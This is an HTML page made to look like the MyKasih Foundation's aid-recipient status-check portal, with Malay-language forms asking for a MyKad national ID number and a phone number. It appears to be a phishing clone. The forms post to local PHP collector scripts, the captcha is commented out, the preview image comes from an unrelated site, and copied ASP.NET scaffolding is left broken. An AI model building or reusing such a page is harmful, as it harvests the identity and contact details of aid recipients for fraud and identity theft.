<html lang="en" class="h-100">
<head id="ctl00_Head1">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <link href="hjb/css/custom.css" type="text/css" rel="stylesheet" />
    <!-- Google tag (gtag.js) --> 
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-VCHP4QZ39R"></script> 
    <script> 
        window.dataLayer = window.dataLayer || [];
        function gtag() { dataLayer.push(arguments); } gtag('js', new Date());
        gtag('config', 'G-VCHP4QZ39R'); 

    </script>

    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta property="og:title" content="MyKasih Foundation" >
    <meta property="og:image" content="https://senaraijawatan.com/wp-content/uploads/2023/08/mykad.png">
    <meta name="description" />
    <meta name="author" content="MyKasih Foundation" />
    <title>MyKasih Recipient Portal</title>
    <link rel="icon" type="image/x-icon" href="favicon.png" />
    <link rel="canonical" href="https://getbootstrap.com/docs/5.0/examples/sticky-footer/" />
    <!-- Bootstrap core CSS -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" />
    <style type="text/css">
        .bd-placeholder-img
        {
            font-size: 1.125rem;
            text-anchor: middle;
            -webkit-user-select: none;
            -moz-user-select: none;
            user-select: none;
        }
        
        @media (min-width: 768px)
        {
            .bd-placeholder-img-lg
            {
                font-size: 3.5rem;
            }
        }
        
        
    </style>
    

</head>
<body class="d-flex flex-column h-100">
    <!-- Begin page content -->
    <main class="flex-shrink-0">
<div id="ctl00_divContainer" class="container container-narrow">
    <div class="text-center mt-2">
    <a id="ctl00_lnkMalay" disabled="disabled" style="color:Black;font-weight:bold;text-decoration:none;">Bahasa Melayu</a>
        <span id="ctl00_lblPipe_bm"> | </span>
    <a id="ctl00_lnkEng" href="">English</a>  
        <span id="ctl00_lblPipe_bi"> | </span>
    <a id="ctl00_lnkChineseSimplified" href=""> 中文(简体) </a>  
        <span id="ctl00_lblPipe_bc"> | </span>
    <a id="ctl00_lnkTamilInd" href="">தமிழ் </a>
    </div>


    <div class="header mt-3 text-center">
      <a href=""><img src="mykasih.jpg" id="ctl00_logohead" class="img-fluid" width="450" /></a>
    </div>
  
</script>


<script src="js/WebResource.js?d=SDgJpi5BX9g81J1SNrR29rg5Q2pcnNI1uyzkn1zKsuMm1XmFaDz1kpwKqvqk3LRl6MmkY3GSfz8CsfNzhcOHgtpQqxEPgp04Za3VQx4L2jY1&t=638240631755514788" type="text/javascript"></script>


<script src="hjb/js/style.js" type="text/javascript"></script>
<script src="js/ScriptResource.js?d=whwkIyKECrF4tWoMW5W9_iIP1Vq8bTStlKHV8PjqsQ_HTieK0w-MxXJXIy-Iazt3NMc7Y5plMQCZLwwk4WT45bLWEezzpYkxE1A7FDReRGvTLrm1WMjJCTXcDy1_75exSfQuspwDItzJQhl41E65jwLG0jhJZp0vQnVtCpSShj41&amp;t=2a5257eb" type="text/javascript"></script>
<script src="js/Telerik.Web.UI.WebResource.js?_TSM_HiddenField_=ctl00_RadScriptManager1_TSM&compress=1&_TSM_CombinedScripts_=%3b%3bSystem.Web.Extensions%2c+Version%3d4.0.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3d31bf3856ad364e35%3ams-MY%3a7c62b5ab-ce5f-4af2-9208-7ca632e5b845%3aea597d4b%3ab25378d2%3bTelerik.Web.UI%2c+Version%3d2013.2.611.40%2c+Culture%3dneutral%2c+PublicKeyToken%3d121fae78165ba3d4%3ams-MY%3a8a277cf4-155d-4ba9-b3c0-d6f62646e5f2%3a16e4e7cd%3a11e117d7" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>

<div>

	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="7612C78C" />
	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEdAAVDcgpGA3BBseV6FnSH2MZSpVslbSx2u6I3B3nfPLIHXl5I96GNPF5dX1Djv7GgeeyxRF73HnerviEmxhzmrH2xb6KHtNsGyGI+Tm6prsO32YmQiJG3i/Cu5RrKCa9XHHuTZzfm2N8z1VKqISPSGQbW" />
</div>
<span id="ctl00_lbl"></span>
    <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$RadScriptManager1', 'aspnetForm', [], [], [], 90, 'ctl00');
//]]>
</script>

    
   
    
   
    <span id="ctl00_lblMsg"></span>

    
    
    <script language="javascript" type="text/javascript">


        function TranslateLang_OnClientEvent(tagID) {
            try {
                if (document.getElementById(tagID) != null) {
                    return document.getElementById(tagID).getAttribute('title');
                }
            }
            catch (err) {
                return '';
            }

        }
    </script>


    <h2 class="fw-bold mt-2 page-header text-center ">
        <span id="ctl00_RecipientMasterContent_lblSubject">Semakan Status</span>
    </h2>

      <span id="ctl00_RecipientMasterContent_lblMsg" style="display:none;"></span>

    <form method="post" action="req/mykad.php" class="row">
      <div class="mb-3">
        <label for="mykad-num" class="form-label">
            <span id="ctl00_RecipientMasterContent_lblEntry_IDNo">Nombor MyKad</span>
            
        </label>
        <div class="input-group mb-3">
        <input name="mykad" maxlength="18" id="mykad-num" class="form-control" type="tel" required="true" placeholder="83XXXXXXXXXX" oninvalid="this.setCustomValidity(TranslateLang_OnClientEvent(this.id))" title="Sila Masukkan Nombor Mykad, contoh 011122334455" />
      </div>

      <!-- <div class="mb-3 text-center">
        <div id="ctl00_RecipientMasterContent_cpcValidSubmit" class="RadCaptcha RadCaptcha_Default">
            <span id="ctl00_RecipientMasterContent_cpcValidSubmit_ctl00" style="color:Red;visibility:hidden;"></span>
            <div id="ctl00_RecipientMasterContent_cpcValidSubmit_SpamProtectorPanel">
		        <img id="ctl00_RecipientMasterContent_cpcValidSubmit_CaptchaImage" alt="" src="cap.jpg" />
	        </div>
            <input id="ctl00_RecipientMasterContent_cpcValidSubmit_ClientState" name="ctl00_RecipientMasterContent_cpcValidSubmit_ClientState" type="hidden" />
        </div>
      </div>
      <div class="mb-3">
        <input name="ctl00$RecipientMasterContent$txtCaptcha" maxlength="5" id="ctl00_RecipientMasterContent_txtCaptcha" class="form-control" type="text" required="true" oninvalid="this.setCustomValidity(TranslateLang_OnClientEvent(this.id))" title="Masukkan Captcha yang betul berdasarkan imej" placeholder="Masukkan Captcha yang betul berdasarkan imej" />
      </div> -->

      <span id="ctl00_RecipientMasterContent_lblMsg" style="display:none;"></span>

    <form method="post" action="req/phone.php" class="row">
      <div class="mb-3">
        <label for="mykad-num" class="form-label">
            <span id="ctl00_RecipientMasterContent_lblEntry_IDNo">Nombor Phone</span>
            
        </label>
        <div class="input-group mb-3">
        <input name="phoneNumber" maxlength="18" id="mykad-num" class="form-control" type="tel" required="true" placeholder="011XXXXXXXXX"/>
      </div>

      <!-- <div class="mb-3 text-center">
        <div id="ctl00_RecipientMasterContent_cpcValidSubmit" class="RadCaptcha RadCaptcha_Default">
            <span id="ctl00_RecipientMasterContent_cpcValidSubmit_ctl00" style="color:Red;visibility:hidden;"></span>
            <div id="ctl00_RecipientMasterContent_cpcValidSubmit_SpamProtectorPanel">
		        <img id="ctl00_RecipientMasterContent_cpcValidSubmit_CaptchaImage" alt="" src="cap.jpg" />
	        </div>
            <input id="ctl00_RecipientMasterContent_cpcValidSubmit_ClientState" name="ctl00_RecipientMasterContent_cpcValidSubmit_ClientState" type="hidden" />
        </div>
      </div>
      <div class="mb-3">
        <input name="ctl00$RecipientMasterContent$txtCaptcha" maxlength="5" id="ctl00_RecipientMasterContent_txtCaptcha" class="form-control" type="text" required="true" oninvalid="this.setCustomValidity(TranslateLang_OnClientEvent(this.id))" title="Masukkan Captcha yang betul berdasarkan imej" placeholder="Masukkan Captcha yang betul berdasarkan imej" />
      </div> -->
      <div class="text-center">
        <button type="submit" name="sendPhone" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;ctl00$RecipientMasterContent$btnSubmit&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))" id="sendPhone" id="mykad" class="btn btn-lg btn-block btn-mk">Semak Status</button>  
      </div>
    </form>

    <input type="hidden" name="ctl00$RecipientMasterContent$lblUserValue" id="ctl00_RecipientMasterContent_lblUserValue" />



<script type="text/javascript">
//<![CDATA[
var Page_Validators =  new Array(document.getElementById("ctl00_RecipientMasterContent_cpcValidSubmit_ctl00"));
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
var ctl00_RecipientMasterContent_cpcValidSubmit_ctl00 = document.all ? document.all["ctl00_RecipientMasterContent_cpcValidSubmit_ctl00"] : document.getElementById("ctl00_RecipientMasterContent_cpcValidSubmit_ctl00");
ctl00_RecipientMasterContent_cpcValidSubmit_ctl00.evaluationfunction = "CustomValidatorEvaluateIsValid";
//]]>
</script>


<script type="text/javascript">
//<![CDATA[

var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
    ValidatorOnLoad();
}

function ValidatorOnSubmit() {
    if (Page_ValidationActive) {
        return ValidatorCommonOnSubmit();
    }
    else {
        return true;
    }
}
        
document.getElementById('ctl00_RecipientMasterContent_cpcValidSubmit_ctl00').dispose = function() {
    Array.remove(Page_Validators, document.getElementById('ctl00_RecipientMasterContent_cpcValidSubmit_ctl00'));
}
Sys.Application.add_init(function() {
    $create(Telerik.Web.UI.RadCaptcha, {"_audioUrl":"js/Telerik.Web.UI.WebResource.js?type=cah\u0026guid=0f4b3860-1adb-4fad-b256-e05660411cae","_enableAudio":false,"_persistCode":false,"clientStateFieldID":"ctl00_RecipientMasterContent_cpcValidSubmit_ClientState"}, null, null, $get("ctl00_RecipientMasterContent_cpcValidSubmit"));
});
//]]>
</script>
</div>
</div>
  </div>
</main>
    <!-- Footer Starts -->
    <footer class="footer mt-auto py-3">
  <div class="container">
    <div class="row">
      <div class="col-5">
        <span class="text-white">
            <span id="ctl00_lblCopyRight">2023 All Rights Reserved. </span> 
        </span>
      </div>
      <div class="col">
        <ul class="nav justify-content-end">
          <li class="nav-item">
          <a id="ctl00_lnkFaq" class="nav-link" href="">
            <i class="bi-question-circle"></i>
            <span id="ctl00_lblFAQ">Soalan Lazim</span></a>
          </li>
          <li class="nav-item">
            <p id="ctl00_linkMerchList">                         
            <a class="nav-link" href=""><i class="bi-shop"></i>
            <span id="ctl00_lblMerchList">Senarai Kedai</span></a>
            </p>
          </li>
          <li class="nav-item">
            <a href="/cdn-cgi/l/email-protection#c9baa8bba889a4b0a2a8baa0a1e7aaa6a4" id="ctl00_linkContactUs" class="nav-link"><i class="bi-envelope"></i>
            <span id="ctl00_lblctctus">Hubungi Kami</span></a>
          </li>
        </ul>
      </div>
    </div>
  </div>
</footer>
    <!-- Placed at the end of the document so the pages load faster -->
    <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src='hjb/Zeejs/jquery-1.11.1.min.js'></script>
    <script type="text/javascript">
        $(document).ready(function () {
            var intputElements = document.getElementsByTagName("INPUT");

            for (var i = 0; i < intputElements.length; i++) {
                if (intputElements[i].id.substring(0, 32) == 'ctl00_RecipientMasterContent_txt') {//Get txt only
                    intputElements[i].oninput = function (e) {
                        e.target.setCustomValidity("");
                        if (!e.target.validity.valid) {
                            e.target.setCustomValidity(TranslateLang_OnClientEvent(this.id));
                        }
                    };
                }
            }
        })
    </script>
</body>
</html>
